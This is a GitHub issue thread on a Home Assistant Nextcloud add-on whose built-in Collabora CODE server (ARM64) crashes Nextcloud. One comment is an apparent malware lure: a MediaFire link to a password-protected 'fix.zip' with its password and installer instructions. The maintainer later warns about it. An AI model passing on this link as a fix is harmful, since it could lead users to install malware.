### ISSUE TITLE
🐛 [Nextcloud] Installing Collabora Built-in CODE Server (ARM64) Crashes Nextcloud 

### ISSUE THREAD

**Issue by dkahn93** [alexbelgium/hassio-addons#1554]
### Description

I know this issue has been submitted before, but just bringing it back, because it's been awhile since the last one was closed, without a fix. Is there any progress on this on the part of this add-on or Collabora/Nextcloud in general? It seems like such an important part of achieving an equal Google Drive alternative. Is there any trick that works at all?

Every time I enable Collabora Built-in CODE Server (ARM64), Nextcloud completely buckles and I can't load it anymore. Note that CPU and RAM usage don't seem to go up that much.

I get NextCloud back to running fine by restarting the add-on and then quickly going to disable Collabora before the CODE server starts up again.

There was one time where after a restart and before the melt down I was able to go to the Nextcloud Office in settings and I saw this error:
<img width="863" alt="nextclouddoc" src="https://github.com/user-attachments/assets/e3d85675-9aa7-4894-bff8-c06e54126a2d">

### Reproduction steps

```bash
1. Install Nextcloud Add-on
2. Click on Apps
3. Install and Enable Nextcloud Office & Collabora Built-in CODE Server (ARM64)
4. Nextcloud won't load anymore.
4. See error
```

### Addon Logs

```bash
the logs just repeat:
"GET /apps/richdocumentscode_arm64/proxy.php?status HTTP/1.1" 499 0 "-" "Nextcloud Server Crawler"
```

### OS

HAos

**Comment by alexbelgium** [comment]
Hello, code server is not supported by the image on which the add-on is based : https://github.com/linuxserver/docker-nextcloud/blob/master/README.md

**Comment by dkahn93** [comment]
Okay, question then. Under the settings of Nextcloud Office another option is to connect a separate server running Collabora online. 

<img width="842" alt="Screenshot 2024-08-28 at 12 19 52 AM" src="https://github.com/user-attachments/assets/08d53516-b434-43a1-8140-62f1fd0d4fef">

It does say that only the built-in collaborative packages are incompatible, so you could create a container that contains the CODE server and then connect it to NextCloud Office? How would one go about doing so in HAos? 

Perhaps this also could be another HA add-on project - to create a Collabora CODE server that people can use to connect in Nextcloud?

**Comment by alexbelgium** [comment]
Hi, that would be the path forward vue I don't have much time for the moment to build a new add-on...

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dkahn93** [comment]
Got it working on the portainer add-on!

**Comment by alexbelgium** [comment]
> Got it working on the portainer add-on!

I saw that github staff deleted the comment linking to the CODE server, make sure that the linked version was safe ! Protecting a file by password can be a way to prevent virus scanners to access it (of course there can be very legitimate reasons to do it also) and it is much better to trust github-published code

**Comment by dkahn93** [comment]
Oh no, I didn't touch that lol, I know better. I used the official image.

**Comment by alexbelgium** [comment]
Ahah you had me worried there for a second ;-)

**Comment by LoganJFisher** [comment]
Could someone clarify what the state of this is? I would really love to get Collabora working with the Nextcloud addon for Homeassistant so I can use Nextcloud Office. Is it doable? If so, how? If not, has the likelihood of a dedicated Collabora addon increased at all?

**Comment by Marty56** [comment]
It is not still working when you use the HA addon.
This holds true also for the x86 version.
